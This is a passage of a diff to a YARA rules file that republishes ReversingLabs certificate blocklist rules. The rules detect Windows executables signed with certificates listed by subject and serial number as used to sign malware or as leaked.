+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1180-L1196"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a"
+		logic_hash = "034b233d6b6dd82ad9fa1ec99db1effa3daaa5bb478d448133c479ac728117ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16901,21 +39295,21 @@ rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jessica Karam" and pe.signatures [ i ] . serial == "09:79:61:67:33:e0:62:c5:44:df:0a:bd:31:5e:3b:92" and 1408319999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D3250B27E0547C77307030491B42802 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8"
+		id = "54073485-e9a5-5a0b-a907-0e8a528da85d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7142-L7160"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1198-L1214"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3"
+		logic_hash = "65f036921dfb9cbce3275aefb7111711e50874440096b2e3c3b55190cfc14ddb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16925,21 +39319,21 @@ rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EKO-KHIM TOV" and ( pe.signatures [ i ] . serial == "00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures [ i ] . serial == "f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" ) and 1598989763 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Banco do Brasil S.A." and pe.signatures [ i ] . serial == "7d:32:50:b2:7e:05:47:c7:73:07:03:04:91:b4:28:02" and 1412207999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00D1836Bd37C331A67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3"
+		id = "4d99e2ee-823e-568d-88b1-48aaf6d44286"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7162-L7180"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1216-L1234"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf"
+		logic_hash = "8af1d10085c5be8924eb6e4ea3a9b8e936c7706d8ec43d42f24a9a293c7f9d27"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16949,21 +39343,21 @@ rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5 th Dimension LTD Oy" and ( pe.signatures [ i ] . serial == "00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures [ i ] . serial == "f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" ) and 1618531200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MINDSTORM LLC" and ( pe.signatures [ i ] . serial == "00:d1:83:6b:d3:7c:33:1a:67" or pe.signatures [ i ] . serial == "d1:83:6b:d3:7c:33:1a:67" ) and 1422835199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Ca028D1A4De0Eb743135Edecf74D7Af : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "25df791f-1128-51f9-90da-9977262d00c7"
+		id = "19e1bce7-ad37-5223-b934-b20e78dfd071"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7182-L7200"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1236-L1252"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996"
+		logic_hash = "60b6351194e23153d425eaa0c25f840080a29abb5eb1bbcd41bb76a3d4130edd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16973,21 +39367,21 @@ rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEVELOP - Residence s. r. o." and ( pe.signatures [ i ] . serial == "00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures [ i ] . serial == "e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" ) and 1618358400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2c:a0:28:d1:a4:de:0e:b7:43:13:5e:de:cf:74:d7:af" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Dbb14Dcf973Eada14Ece7Ea79C895C11 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7c685bb7-3201-5ffc-856b-657d824595ab"
+		id = "139f2e4f-7997-5cfd-aba2-dcf8d7525f5e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7202-L7218"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1254-L1270"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093"
+		logic_hash = "c73c83f5cb6d840b887e1aa41e96a29529f975434ac27a5aa57f2e14b342f63d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16997,21 +39391,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "db:b1:4d:cf:97:3e:ad:a1:4e:ce:7e:a7:9c:89:5c:11" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8C2239De3977B8D4A3Dcbedc9031A51 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4"
+		id = "3e102d0a-30e3-5f0a-9b67-a5fd15117e69"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7220-L7238"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1272-L1288"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133"
+		logic_hash = "aa4f39790bc58b0a50e05e7670abad654d7f3d73e500bd5f054fece4a979ebfa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17021,21 +39415,21 @@ rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and ( pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures [ i ] . serial == "d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" ) and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1"
+		id = "d95b5e25-679c-57f8-b790-8f5633a23e4b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7240-L7258"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1290-L1306"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6"
+		logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17045,21 +39439,21 @@ rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and ( pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures [ i ] . serial == "80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" ) and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "e45d66b0-58ae-5054-b0a7-47a001daac7a"
+		id = "8f316011-9a29-5366-a26a-1fe20651ef17"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7260-L7276"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1308-L1324"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97"
+		logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17069,21 +39463,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe"
+		id = "af912c64-334d-51f5-8ca4-707fcec512ba"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7278-L7294"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1326-L1342"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5"
+		logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17093,21 +39487,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "602b8c18-3dad-55b9-bb47-3f9835a049ac"
+		id = "da1895fd-ec29-513d-b8ae-2317f84b8280"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7296-L7312"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1344-L1360"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d"
+		logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17117,21 +39511,21 @@ rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd"
+		id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7314-L7330"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1362-L1378"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6"
+		logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17141,21 +39535,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d5f810ee-127a-5df0-9299-ffeaddf369ee"
+		id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7332-L7348"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1380-L1396"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0"
+		logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17165,21 +39559,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c"
+		id = "df34eb28-18ec-568b-8257-0b2f7959868c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7350-L7366"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1398-L1414"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7"
+		logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17189,21 +39583,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9d32947c-778f-5e2d-b0b1-4a17a108035e"
+		id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7368-L7384"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1416-L1432"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81"
+		logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17213,21 +39607,21 @@ rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000 <= pe.signatures [ i ] . not_after )
